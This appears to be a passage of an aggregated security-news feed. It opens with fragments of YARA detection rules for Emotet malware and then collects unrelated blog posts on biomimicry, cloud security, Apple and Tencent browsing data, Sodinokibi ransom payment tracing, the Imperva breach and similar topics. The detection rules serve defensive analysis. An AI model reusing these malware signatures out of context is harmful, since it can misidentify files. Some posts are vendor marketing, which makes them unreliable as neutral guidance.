      $s16 = "RpFqNpYQapubxqPNu6yDXrsXC6qB7CzF0GzVj0FjbT6RdW15ncWnY7/vh92xHgE5j7MjB9mZ3mVK5FiwlKhYoKj4kIq4A4DduIQLc4bcLK/RsNUFQeBu9pLlbsmemKY/" ascii
      $s17 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s18 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s19 = "iBunjDe9gVct7Gx3d65SQF8nvahJU+cRqKveP/H4pE9bLL3YAz8VqHTnT7v1JHR3MIjkUxv0uwvjI92YWFenoW2yzU8NNEwfd/JCOHlrnZwY4x9adVfbdyGcpG9X8DDB" ascii
      $s20 = "pKjTapsqZ36hVbhZOPU4sD5ekeEYE2WaixuncUK41ZSfp87TA/3tI91r1DvwoBcDoQywknwbTexd6FjAV+2Ac8gY7SPda9RPwKByrBsJvAE05AhPsWyl0KilUwtkCFjk" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 800KB and
      ( pe.imphash() == "ffcd1ab4ae5e052202d6af1ea2767498" or ( 1 of ($x*) or 4 of them ) )
}

rule EMOTET_SOC_PE {
   meta:
      date = "2019-10-13"
      hash1 = "6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7"
   strings:
      $x1 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
      $x2 = "Customer50041 Keeling Bypass, North Christellefort, Tunisia Global128 Manuel Stravenue, New Nicholasfort, Montserrat" fullword ascii
      $x3 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $x4 = "Forward297 German Trail, West Miloshire, Germany Product44796 Chesley Bypass, East Santos, Antigua and Barbudan" fullword ascii
      $x5 = "Regional1198 Rahsaan Motorway, Klockoburgh, Czech Republic Human326 Olson Bypass, North Nicholaus, Zimbabwe" fullword ascii
      $x6 = "Dynamic6743 Hickle Bypass, West Karliborough, United States Minor Outlying Islands Product6344 Zieme Inlet, Gloverfurt, Taiwan" fullword ascii
      $x7 = "*\\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd#Microsoft Forms" wide
      $s8 = "Central080 Ari Ranch, Port Sarinachester, Saint Vincent and the Grenadines Product4773 Cornelius Ford, Maybelleville, Morocco" fullword ascii
      $s9 = "Senior75970 Kiehn Brook, Port Joaquin, Comoros Forward6656 Parker Extension, Halvorsonton, Zambia" fullword ascii
      $s10 = "6868686868686868686868" ascii /* reversed goodware string '8686868686868686868686' */ /* hex encoded string 'hhhhhhhhhhh' */
      $s11 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
      $s12 = "Dynamic98251 Karli Mission, Deronhaven, Democratic People's Republic of Korea Chief1365 Hermann Passage, Rickyport, Oman24 " fullword ascii
      $s13 = "Forward0973 Nienow Dam, Walkermouth, Egypt Customer976 MacGyver Mountain, Schoentown, Northern Mariana Islands+ Lo " fullword ascii
      $s14 = "Corporate28089 Etha Bypass, Jastbury, Turkmenistan Dynamic764 Price Cliffs, Welchtown, Algeriaog(1 " fullword ascii
      $s15 = "National4629 Brianne Locks, Port Shadburgh, Bangladesh Forward481 Ashton Course, Lake Judson, Pakistana Pr" fullword ascii
      $s16 = "Forward563 Sasha Mountains, Nitzschestad, Palau Lead58549 Lesch Parkways, Port Archburgh, Burundi" fullword ascii
      $s17 = "Forward00009 Labadie Valley, Lake Othaview, Brunei Darussalam Future796 Fritsch Road, Mertzchester, Montserrat1831 " fullword ascii
      $s18 = "Central9007 Leland Isle, Laurynview, Morocco Product75313 Mueller Harbors, West Nakiafort, Lithuania+ Log( " fullword ascii
      $s19 = "Regional973 Aubrey Squares, South Simoneville, Svalbard & Jan Mayen Islands Dynamic7842 Madilyn Course, O'Harastad, Armenia" fullword ascii
      $s20 = "Lead7617 Nicolas Meadows, West Odell, Saint Pierre and Miquelon Product9412 Stamm Cove, South Katlynnport, Comoros " fullword ascii
   condition:
      uint16(0) == 0xcfd0 and filesize < 900KB and
      1 of ($x*) and 4 of them
}


Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature

Since digital systems have been built to well, mimic the way live systems function and behave (and malware also mimics the way a virus infection or disease behaves life), cybersecurity and biology have more in common than you’d think. Here’s how we can take a fresh look at this congruence by exploring the concept of biomimicry.

When it comes to ecosystems, our information technology ecosystem is very, very young (for example, the global internet is only about 30). Our planetary ecosystem, however, is well over 3 billion years old.

That’s 3-plus billion years of evolutionary innovation and natural intelligence that has inspired countless breakthroughs in the world of design — and that is now being tapped for game-changing new ideas in the high-stakes world of information security.

So, what can such creatures as the humble ant teach us about cybersecurity? Or for that matter, the chameleon or the Bornean moth?

Cybersecurity and Biology. The Idea of Biomimicry

Welcome to the fertile field of biomimicry which, according to Smithsonian Magazine (“How Biomimicry is Inspiring Human Innovation”), hinges on the notion that “we human beings, who have been trying to make things for only the blink of an evolutionary eye, have a lot to learn from the long processes of natural selection, whether it’s how to make a wing more aerodynamic or a city more resilient or an electronic display more vibrant.”

Or in the case of cybersecurity, to make information systems and defenses more secure, resilient, adaptable and secure.

The millions of species and organisms that have inhabited this planet far longer than humans have learned to adapt to life on earth uniquely, gracefully and sometimes with astonishing brilliance. As science author and biomimicry expert Janine Benyus put it, “they are our elders” so why not learn as much as we can from their “3.8 billion years of research and development.”

What is Biomimicry? [Several Definitions]

biomimicry and tech concept photo

While not a familiar term to all, humankind has used biomimicry from the time we started wearing animal skins for warmth.

“One of the most often-cited examples is Velcro, which the Swiss engineer Georges de Mestral patented in 1955 after studying how burs stuck to his clothes,” according to the Smithsonian report. In other examples, “a fan-created by Pax Scientific borrows from the patterns of swirling kelp, nautilus and whelks to move air more efficiently. A saltwater-irrigated greenhouse in the Qatari desert will use condensation and evaporation tricks gleaned from the nose of a camel.”

One of the best and simplest ways to think of biomimicry is “innovation inspired by nature.”

The term is believed to have been coined in 1982 and popularized by Janine Benyus in her 1997 book titled, you guessed it, “Biomimicry: Innovation Inspired by Nature.” Among the countless examples, she cites is the Wright brothers employing biomimicry by observing pigeons and vultures and using them as inspiration in the creation of the first airplane.

“Our most clever architectural struts and beams are already featured in lily pads and bamboo stems. Our central heating and air-conditioning are bested by the termite tower’s steady 86 degrees F. Our most stealthy radar is hard of hearing compared to the bat’s multifrequency transmission. And our new ‘smart materials’ can’t hold a candle to the dolphin’s skin or the butterfly’s proboscis. Even the wheel, which we always took to be a uniquely human creation, has been found in the tiny rotary motor that propels the flagellum of the world’s most ancient bacteria,” she writes.

“Unlike the Industrial Revolution, the Biomimicry Revolution introduces an era based not on what we can extract from nature, but on what we can learn from her.”

In addition to her books, Benyus has delivered multiple Ted Talks on the topic including: “Biomimicry’s Surprising Lessons From Nature’s Engineers” and “Biomimicry in Action.”

Here is how two of the leading organizations devoted to the study and advancement of biomimicry define the art and science of innovation inspired by nature.

“Biomimicry is an approach to innovation that seeks sustainable solutions to human challenges by emulating nature’s time-tested patterns and strategies.”Biomimicry.org

“Biomimicry is learning from and then emulating nature’s forms, processes, and ecosystems to create more sustainable designs.”Biomimicry.net

Biomimicry in Cyber Security: Digital Ants to the Rescue

digital lens over city night life

Creating analogies between cybersecurity and biology is not exactly new. Since the very advent of cybersecurity, experts have diagnosed the spread of malware in terms inspired by biology, such as ‘virus‘, ‘infection‘, ‘epidemic‘ and so on. But biomimicry is a more refined and accurate research field which may be just what cybersecurity approaches need right now for a greater focus. A fresh point of view is also always welcome, if only for avoiding a monoculture approach.

Some people who are also enthusiastically adopting this blended approach of combining cybersecurity and biology insights are dubbing this bio-cybersecurity. They support the idea that it’s an entirely new field, warranting its own research. While time will tell on whether a new science is born or not, it’s clear that cybersecurity and biology can have a lot to learn from each other.

OK, so what can the humble ant teach us about cybersecurity?

Well, ants are known to work collaboratively to accomplish such tasks as building, defending and repairing their nests. According to a Wall Street Journal article by JR Reagan, global chief information security officer for Deloitte (“The Nature Lover’s Guide to Cyber Security”), cybersecurity researchers are applying this type of “swarm intelligence.”

In one project which beautifully blends cybersecurity and biology, so-called “digital ants” monitor systems for anomalies such as malware. The ants drop “markers” where unusual activity occurs, similar to the pheromonal markers ants place along paths to food. When the markers at a given location exceed a certain threshold, an alarm is triggered to alert human cybersecurity specialists.

Bornean moths and chameleons also possess innate intelligence and capabilities applicable to information security, writes Reagan. The moths, for example, protect themselves from birds by creating leaf tents. Using a similar principle, “data masking” shields sensitive personal information from unauthorized viewers by replacing it with phony data.

The chameleon fools predators by changing colors to blend in with its surroundings, rendering itself nearly invisible. In cybersecurity, a practice called steganography disguises sensitive data to make it look like something else, say a picture of a flower or a music file.

Borrowing from the natural world to safeguard a virtual one” may seem paradoxical, writes Reagan. “But humans have engaged in biomimicry for eons. … Now, as then, we may find some of the best solutions to our problems on nature’s path.

Potential cybersecurity and biology combo strategies are also offered by the tale, or rather tail, of the lizard — a creature that easily sheds its tail when attacked in order to protect its more vital organs.

The Harvard Business Review, in an article titled “Defeat Hackers with Biomimicry,” explains how this concept can be adapted to cybersecurity. “There may be sacrificial systems or information you can offer up as a decoy for a cyber-predator, in which case an attack becomes an advantage, allowing your organization to see the nature of the attacker and giving you time to add further security in the critical part of your information infrastructure.

The belief that biomimicry is crucial to the future of cybersecurity is taken a step further in a piece penned by a biomimicry expert and a cyber CEO. In “Only Biomimicry Will Save Cybersecurity,” Idriss Aberkane and Stuart McClure write that biomimicry may even offer the promise of developing something resembling a virtual immune system.

Deep learning mimics nature: Looking at the Internet as an organism, we can attempt to copy the way organisms ensure their internal security“, they write. “Tomorrow’s security software will evolve as a predator-prey dynamic system, with each software population acquiring new characteristics until the entire system stabilizes its software diversity the same way an ecosystem stabilizes its biodiversity.

Finally, while not speaking specifically about biomimicry, another tech visionary also seemed to grasp the potential for applying the study of living organisms to the world of computers (thus successfully blending the best of cybersecurity and biology). Apple founder Steve Jobs, once said, “I think the biggest innovations of the 21st century will be at the intersection of biology and technology. A new era is beginning.

About the Author:

Michelle Moore, Ph.D., is an academic director and adjunct professor for the University of San Diego’s innovative, online Master of Science in Cyber Security Operations and Leadership program. She is also a researcher, author and cybersecurity policy analyst with over two decades of private-sector and government experience as a cybersecurity expert.

The post Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature appeared first on Heimdal Security Blog.

Defining Cloud Security – Is It the Endpoint, Your Data, or the Environment?

You’ve heard it once; you’ve heard it a hundred times – “secure the cloud.” But what does that phrase mean? On the surface, it’s easy to assume this phrase means using cloud-enabled security products. However, it’s much more than that. Cloud security is about securing the cloud itself through a combination of procedures, policies, and technologies that work together to protect the cloud—from the endpoint to the data to the environment itself. A cloud security strategy must be all-encompassing, based on how data is monitored and managed across the environment. So, let’s examine how IT security teams can address common cloud challenges head-on, while at the same time establishing the right internal processes and adopting the necessary solutions in order to properly secure the cloud.

Cloud Security’s Top Challenges

As we enter a post-shadow IT world, security teams are now tasked with understanding and addressing a new set of challenges—those that can stem from a complex, modern-day cloud architecture. As the use of cloud services grows, it is critical to understand how much data now lives in the cloud. In fact, the amount of sensitive data stored in cloud-based files is only growing, currently standing at 21% after having increased 17% over the past two years. So it’s no wonder that threats targeting the cloud are growing, too: The average organization experiences 31.3 cloud-related security incidents each month, a 27.7% increase over the same period last year.

Frequently impacted by data breaches and DDoS attacks, cloud technology is no stranger to cyberthreats. However, the technology is also impacted by challenges unique to its makeup—such as system vulnerabilities and insecure user interfaces (UIs) and application programming interfaces (APIs), which can all lead to data loss. Insecure UIs and APIs are top challenges for the cloud, as the security and availability of general cloud services depends on the security of these UIs and APIs. If they’re insecure, functionalities such as provisioning, management, and monitoring can be impacted as a result. There are also bugs within cloud programs that can be used to infiltrate and take control of the system, disrupt service operations, and steal data, mind you. The challenge we see with data and workloads moving to the cloud is insufficient knowledge of developers on the evolution of cloud capabilities. We are finding misconfigurations to be one of the major contributors of data leaks and data breaches as well, meaning cloud configuration assessment is another best practice that IT should own. Another major source of cloud data loss? Improper identity, credential, and access management, which can enable unauthorized access to information via unprotected default installations.

The good news? To combat these threats, there are a few standard best practices IT teams can focus on to secure the modern-day cloud. First and foremost, IT should focus on controls and data management.

Security Starts with Process: Controls and Data Management

To start a cloud security strategy off on the right foot, the right controls for cloud architecture need to be in place. Cloud security controls provide protection against vulnerabilities and alleviate the impact of a malicious attack. By implementing the right set of controls, IT teams can establish a necessary baseline of measures, practices, and guidelines for an environment. These controls can range from deterrent and corrective to preventative and protective.

In tandem with controls, IT teams need to establish a process or system for continually monitoring the flow of data, since insight into data and how it is managed is vital to the success of any cloud security strategy. A solution such as McAfee Data Loss Prevention (DLP) can help organizations monitor data through the use of a management console or dashboard. This tool can help secure data by extending on-premises data loss prevention policies to the cloud for consistent DLP, protecting sensitive data wherever it lives, tracking user behavior, and more.

Solving for Visibility, Compliance, and Data Protection

When it comes to securing data in the cloud, visibility and compliance must be top of mind for IT teams as well. Teams need to gain visibility into the entirety of applications and services in use, as well as have proper insight into user activity to have a holistic view of an organization’s existing security posture. They also need to be able to identify sensitive data in the cloud in order to ensure data residency and compliance requirements are met.

That’s precisely why IT teams need to adopt an effective cloud access security broker (CASB) solution that can help address visibility and compliance issues head-on. What’s more, this type of solution will also help with data security and threat protection by enforcing encryption, tokenization, and access control, as well as detecting and responding to all types of cyberthreats impacting the cloud.

Bringing It All Together

By combining the right controls and data management processes with a CASB solution, security teams can protect the cloud on all levels. A CASB solution like McAfee MVISION Cloud protects data where it lives today, in the cloud. This CASB solution is a cloud-hosted software that sits between cloud service customers and cloud service providers to enforce security, compliance, and policies uniformly across all cloud assets, from SaaS to IaaS/PaaS. Plus, McAfee MVISION Cloud can help organizations extend security controls of their on-premises infrastructure to the cloud and beyond. To extend these controls, this solution detects, protects, and corrects. During detection, IT security teams gain complete visibility into data, context, and user behavior across all cloud services, users, and devices. When data leaves the cloud, McAfee MVISION Cloud applies persistent protection wherever it goes: in or outside the cloud. And when an error does occur, the solution takes real-time action deep within cloud services to correct policy violations due to human error and stops security threats. While McAfee MVISION Cloud protects the cloud itself, it’s also important to protect access to the cloud at the start, or the endpoint. An endpoint security solution, such as McAfee Endpoint Security, is also integral for safeguarding the cloud, since endpoints are a target for credential theft that leads to greater risk in the cloud environment.

In an ever-changing threat landscape, implementation of the proper controls and data management, with the addition of effective cloud security solutions, are the keys to a strong cloud security strategy. By taking into account and working to proactively protect the multitude of endpoints connected to the cloud, the amount of data stored in the cloud, and the cloud environment itself, IT security teams can help ensure the cloud is secure.

To learn more about cloud security and other enterprise cybersecurity topics, be sure to follow us @McAfee and @McAfee_Business.

 

The post Defining Cloud Security – Is It the Endpoint, Your Data, or the Environment? appeared first on McAfee Blogs.

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple, most of its users likely ignore that the company is sharing iOS web browsing data on some of them to Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying, starting from at least iOS 12.2, Apple has integrated the “Tencent Safe Browsing” to improve security of its users and protect them from fraudulent websites. The Tencent Safe Browsing does it by implementing the “Fraudulent Website Warning” feature in the Safari web browser for both iOS and macOS that checks every site visited by the users.

Apple secure browsing

The service leverages a blacklist of malicious websites that are continuously updated. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to know the websites he visits and also log their IP address to manage the browsing history. At the time, it’s not clear if Tencent is also collecting IP addresses from users residing outside of China, likely the Tencent’s blacklist is only provided to Chinese users because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a game pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that such kind of major changes has to be notified to the users.

The good news is that users could turn off the Fraudulent Website Warning feature in Safari, even if they are potentially exposed to online threats.

The feature is enabled by default on iPhones and iPads devices running iOS 13, below the instruction to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money

Episode 3: Follow the Money

This is the third installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandCrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid 2019.

The Talking Heads once sang “We’re on a road to nowhere.” This expresses how challenging it can be when one investigates the financial trails behind a RaaS scheme with many affiliates, etc.

However, we persisted, and we prevailed. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue; even getting detailed insights into what the affiliates do with their earnings following a successful attack.

With the Sodinokibi ransomware a unique BTC wallet is generated for each victim. As long as no payment is made, no trace of the BTC wallet will be available on the blockchain. The blockchain operates as a public ledger of all bitcoin transactions that have happened. When no currencies are exchanged, no transactions are recorded. Although many victims hit the news, we understand that if they paid, sharing that with the research community is maybe a bridge too far. On one of the underground forums we discovered the following post:

In this post the actors are expanding their successful activity and offering a 60 percent cut as a start and, after three successful payments by the affiliate (read successful ransomware infections and payments received from the victims), the cut increases to 70 percent of the payments received. This is very common as we saw in the past with RaaS schemes like GandCrab and Cryptowall.

Responding to this post is an actor with the moniker of ‘Lalartu’ and his comments are quite interesting, hinting he was involved with GandCrab. As a site-note: “Lalartu’ means ‘ghost/phantom’. Its origins are from the Sumerian civilization where Lalartu was seen as a vampiric demon.

Researching the moniker of ‘Lalartu’ through our data, we went back in time a month or so and discovered a posting from the actor on June 4th of 2019, again referencing GandCrab.

We observe here a couple of transaction IDs (TXID) on the bitcoin ledger, however they are incomplete. More than a week later, on June 17th, 2019, “Lalartu” posted another one with an attachment to it:

 

In this posting we see a screenshot with partial TXIDs and the amounts. With the help of the ChainAnalysis software and team, we were able to retrieve the full TXIDs. With that list we were able to investigate the transactions and start mapping them out with their software:

From the various samples we have researched, the amounts asked for payment are between 0.44 and 0.45 BTC, an average of 4,000 USD.

In the above screenshot we see the transactions where some of these amounts are transferred from a wallet, or bitcoins are bought at an exchange and transferred to the wallets associated with the affiliate(s).

Based on the list shared by Lalartu in his post, and the average value of bitcoin around the dates, within 72 hours a value of 287,499.00 USD of ransom had been transferred.

Taking the list of transactions as a starting point in our graph-analysis, we colored the lines red and started from there to investigate the wallets involved and interesting transactions:

Although it might look like spaghetti, once you dive in, very interesting patterns can be discovered. We see victims paying to their assigned wallets; from there it takes an average of two to three transactions before it goes to an ‘affiliate’ or ‘distribution’ wallet. From that wallet we see the split happening as the moniker ‘UNKN’ mentioned in his forum post we started this article with. The 60 or 70 percent stays with the affiliate and the remaining 40/30 percent is forwarded in multiple transactions towards the actors behind Sodinokibi.

Once we identified a couple of these transactions, we started to dig in both directions. What is the affiliate doing with the money and where is the money going for the Sodinokibi actors?

We picked one promising affiliate wallet and started to dig deeper down and followed the transactions. As described above, the affiliate is getting money transferred mostly through an exchange (since this is being advised by the actors in the ransom note). This is what we see in the example below. Incoming ransomware payments via Coinbase.com are received. The affiliate seems to pay some fee to a service but also sends BTC into Bitmix.biz a popular underground bitcoin mixer that is obfuscating the next transactions to make it difficult to link the transactions back to the ‘final’ wallet or cash-out in a (crypto) currency.

We also observed examples where the affiliates were paying for services, they bought on Hydra Market. Hydra Market is a Russian underground marketplace where many services and illegal products are offered with payment in BTC.

Tracing down the route of splits, we started to search for the 30 or 40 percent cuts of the ransom payments of 0.27359811 BTC or, if the price was doubled, 0.54719622 BTC.

Using the list of amounts and querying the transactions and transfers discovered, we observed a wallet that was receiving a lot of these smaller payments. Due to ongoing research we will not publish the wallet but here is a graph representation of a subset of transactions:

It seems like a spider, but many incoming ‘split’ transfers, and only a few outgoing ones with larger amounts of bitcoins, were observed.

If we take the average of $2,500 – $5,000 USD as a ransom ask, and the mentioned split of 30/40 percent for the actor maintaining the Sodinokibi ransomware and affiliate infrastructure, they make $700 – $1,500 USD per paid infection.

We already saw in the beginning of this article that the affiliate Lalartu claimed to have made 287k USD in 72 hours, which is an 86k USD profit for the actor from one affiliate only.

In episode 2, The All-Stars, we explained how the structure is setup and how each affiliate has its own id.

As far as we tracked the samples and extracted the amount of id-numbers, we counted over 41 affiliates being active. The data showed a in a relatively short amount of time the velocity and number of infections was high. Taken this velocity combined with a few payments per day, we can imagine that the actors behind Sodinokibi are making a fortune.

Following the traces of one particular affiliate, we ended up seeing large amounts of bitcoins being transferred into a wallet which had a total value of 443 BTC, around 4,5 million USD with the average bitcoin price.

We do understand that there are situations in which executives decide to pay the ransom but, by doing that, we keep this business model alive and also fund other criminal markets.

Conclusion

In this blog we focused on insights into the financial streams behind ransomware. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue. In some cases, we were able even to get detailed insights into what the affiliates do with their earnings following a “successful” attack. It shows that paying ransomware is not only keeping the ‘ransom-model’ alive but is also supporting other forms of crime.

In the next and final episode, “Crescendo” McAfee ATR reveals insights gleaned from a global network of honey pots.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money appeared first on McAfee Blogs.

IDG Contributor Network: 5 practical ways your organization can benefit from DevSecOps

It’s right there in the moniker: DevSecOps , a portmanteau of Development, Security and Operations,  implies introducing security early on – as a part of a comprehensive, agile Software Development Life Cycle (SDLC) used by your organization, rather than doing so iteratively or waiting until after a release.

Given how security breaches and vulnerabilities have become everyday news, it makes little sense for developers to ignore the seriousness of secure coding anymore. Here’s a little secret though: developers are often not the most security-oriented folks for obvious reasons. It is not their primary duty. The priority for a software developer is to build an app, have it carry-out the intended tasks nicely and perhaps account for the overall user experience (UX) and satisfaction. If they are being diligent, they may incorporate basic ‘security checks’ as a part of their coding processes – such as not blindly trusting user input and sanitizing it, but beyond that, a developer may not alone have adequate bandwidth or expertise to incorporate the most superior security checks in an app.

To read this article in full, please click here

SAP Teched Postmortem: SAP HANA Cloud’s potential impact on S/4HANA

Among the announcements coming out of SAP Teched in Barcelona last week was the impending release of SAP HANA Cloud, where the database has been rearchitected specifically for the cloud. While SAP has not mentioned anything specific about it, we think that HANA’s cloud design could have a huge impact on how SAP delivers its enterprise SaaS services, starting with S/4HANA.

Factoring 2048-bit Numbers Using 20 Million Qubits

This theoretical paper shows how to factor 2048-bit RSA moduli with a 20-million qubit quantum computer in eight hours. It's interesting work, but I don't want overstate the risk.

We know from Shor's Algorithm that both factoring and discrete logs are easy to solve on a large, working quantum computer. Both of those are currently beyond our technological abilities. We barely have quantum computers with 50 to 100 qubits. Extending this requires advances not only in the number of qubits we can work with, but in making the system stable enough to read any answers. You'll hear this called "error rate" or "coherence" -- this paper talks about "noise."

Advances are hard. At this point, we don't know if they're "send a man to the moon" hard or "faster-than-light travel" hard. If I were guessing, I would say they're the former, but still harder than we can accomplish with our current understanding of physics and technology.

I write about all this generally, and in detail, here. (Short summary: Our work on quantum-resistant algorithms is outpacing our work on quantum computers, so we'll be fine in the short run. But future theoretical work on quantum computing could easily change what "quantum resistant" means, so it's possible that public-key cryptography will simply not be possible in the long run. That's not terrible, though; we have a lot of good scalable secret-key systems that do much the same things.)

Analysis reveals the most common causes behind mis-issued SSL/TLS certificates

We should be able to trust public key certificates, but this is the real world: mistakes and “mistakes” happen. Researchers from Indiana University Bloomington have analyzed 379 reported instances of failures in certificate issuance to pinpoint the most common causes as well as systemic issues that contribute to these happening. About public key certificates A public key certificate (aka digital certificate) proves that an individual, entity or a device is the rightful owner and user … More

The post Analysis reveals the most common causes behind mis-issued SSL/TLS certificates appeared first on Help Net Security.

Stolen Cloud API Key to Blame for Imperva Breach

Stolen Cloud API Key to Blame for Imperva Breach

A security breach which led to the compromise of customer data at Imperva was caused by a stolen API key for one of its Amazon Web Services (AWS) accounts, the firm has revealed.

The firm was notified of the incident, which affected a subset of its Cloud WAF customers, by a third party at the end August.

Chief technology officer, Kunal Anand, explained in a blog post that the firm decided back in 2017 to migrate to the AWS Relational Database Service (RDS) in order to provide greater scale for its user database.

As part of this process the firm created a database snapshot for testing on September 15, 2017.

Separately, Imperva’s IT team created an internal compute instance containing an AWS administrative API key. Unfortunately, this server was left exposed and subsequently found by a hacker, who stole the all-important key and used it to access the database snapshot, exfiltrating the information in October 2018.

The stolen data included email addresses, hashed and salted passwords, API keys, and TLS keys — although Anand claimed to have found no evidence so far that it is being abused for malicious ends.

Imperva has since tightened its internal security, by ensuring new instances are created behind a VPN, unused and non-critical instances are decommissioned, and by putting monitoring and patching programs in place.

Other corrective actions taken include an increase in the frequency of infrastructure scanning, tighter access controls, and an increase in auditing of snapshot access.

At Imperva’s request, more than 13,000 customer passwords were changed and over 13,500 SSL certificates rotated following the breach, highlighting the scale of the incident. In addition, over 1400 API keys were regenerated, according to Anand.

Scottish Teens Charged With Met Police Hack

Scottish Teens Charged With Met Police Hack

Two Scottish teenagers have been arrested on suspicion of hacking and defacing a news platform used by London’s Metropolitan Police earlier this year.

An 18-year-old from Lossiemouth near Inverness and a 19-year-old from Glasgow were charged by Scottish police, according to the BBC.

The July attack compromised the Met’s Mynewsdesk platform and allowed the hackers to post a string of offensive and often bizarre messages to the police force’s Twitter feed, as well as emails sent to subscribers and a micro-site.

The Twitter account, which has over one million subscribers, was hijacked to post messages including: “F*** THE POLICE FREE DA GANG!!,” “what you gonna do phone the police?,” and “XEON IS THE BEST FIGHTER IN SCOTLAND.”

At the time, right-wing commentator Katie Hopkins jumped on the news to claim the police force had not only “lost control of London streets” but also "lost control of their Twitter account too.”

Shortly after, Donald Trump retweeted her comments to continue his spat with London mayor Sadiq Khan, claiming: “With the incompetent Mayor of London, you will never have safe streets.”

“Two men, aged 18 and 19, from the Lossiemouth and Glasgow areas respectively, have been arrested and charged in connection with unauthorized access and publication of content on the Metropolitan Police Service's news platform on Friday 19 July 2019,” a Police Scotland spokesperson told the British broadcaster.

“A report will be submitted to the Crown Office and Procurator Fiscal Service.”

It’s unclear how the account was remotely compromised, although the obvious culprit would be easy-to-guess or crack passwords.

At the time of the initial incident, security experts urged organizations to improve login security and for IT to communicate the implications of neglecting such processes to regular users who may be in charge of public-facing accounts.

Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF)

Estimated reading time: 2 minutes

A shift to prioritize data security investments through a Data Security Governance Framework (DSGF) was among the top seven security and risk management trends identified by global research & advisory firm Gartner in 2019.

Breaking it down, the report observed that the changing paradigm of security meant that enterprises were required to identify other frameworks for protecting data. The first step involves the understanding of the data generated by asking questions such as:

  • Why was this data created?
  • When was it created?
  • How will it be used?
  • Is this data compliant with the regulations my business needs to adhere to?
  • Can the original owner of the data make a request to get it deleted?

A framework for better data security

By answering these questions, enterprises can create a Data Security Governance Framework (DSGF) to better utilize and protect data. The research recommends this approach over acquiring data protection products and trying to adapt to them to suit a business need. A Data Security Governance Framework (DSGF) provides a blueprint that is organization-centric which classifies data assets and provides the bedrock for data security policies.

In this framework, there is no one-size-fits-all solution. Every enterprise approaches data security on a case-by-case basis, trying to understand their unique data security requirements in the hopes of finding unique solutions.

The need for better alignment

The framework helps to provide a balance between the business need to maximize competitive advantage and the need to apply appropriate security policy rules. Adopting this framework will require greater collaboration within an enterprise’s Information Security Team regarding aligning approaches for data classification and lifecycle management. This involves classifying data according to unique requirements – which dataset is the most important and requires maximum security?

Different businesses use different methods for protecting data –

Data Masking

A method through which data at rest or in motion is masked which protects it but also ensures that it is usable. It helps organizations raise their level of security for sensitive data while conforming to privacy regulations and other compliances.

Data Audit and Protection

This method uses active data control, monitoring and logging to check and detect suspicious activities.

Unusual behaviour and anomalies are detected and flagged and acted upon instantly by stopping suspicious users from accessing critical data and flagging network administrators about this behaviour. Data is separated from users as per their roles.

DSGF can be a useful tool for enterprises to plan their data security investments and allocations. The framework helps an enterprise understand their own requirements clearly and helps enterprises to make better decisions on investment purposes. Some of the key details that DSGF can help in are in:

  • Volume, veracity and variety details of each type of dataset
  • Business risks and financial impacts of each dataset
  • Data residency issues affecting each dataset, specifically as there are different data privacy laws for different geographies and jurisdictions
  • Asset management data
  • Consistent access and usage policies for different datasets

Rather than using technology to solve their data security issues, enterprises must ideally use the Data Security Governance Framework (DSGF) to understand and identify their own business requirements. Once the identification is conducted and a framework is created, it would then be prudent to identify the appropriate technology solution for an enterprise’s own data needs.

However, if you want expert consultation on your current framework, please contact us and we will be glad to advise you.

The post Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF) appeared first on Seqrite Blog.

Apple Under Fire Over Sending Some Users Browsing Data to China’s Tencent

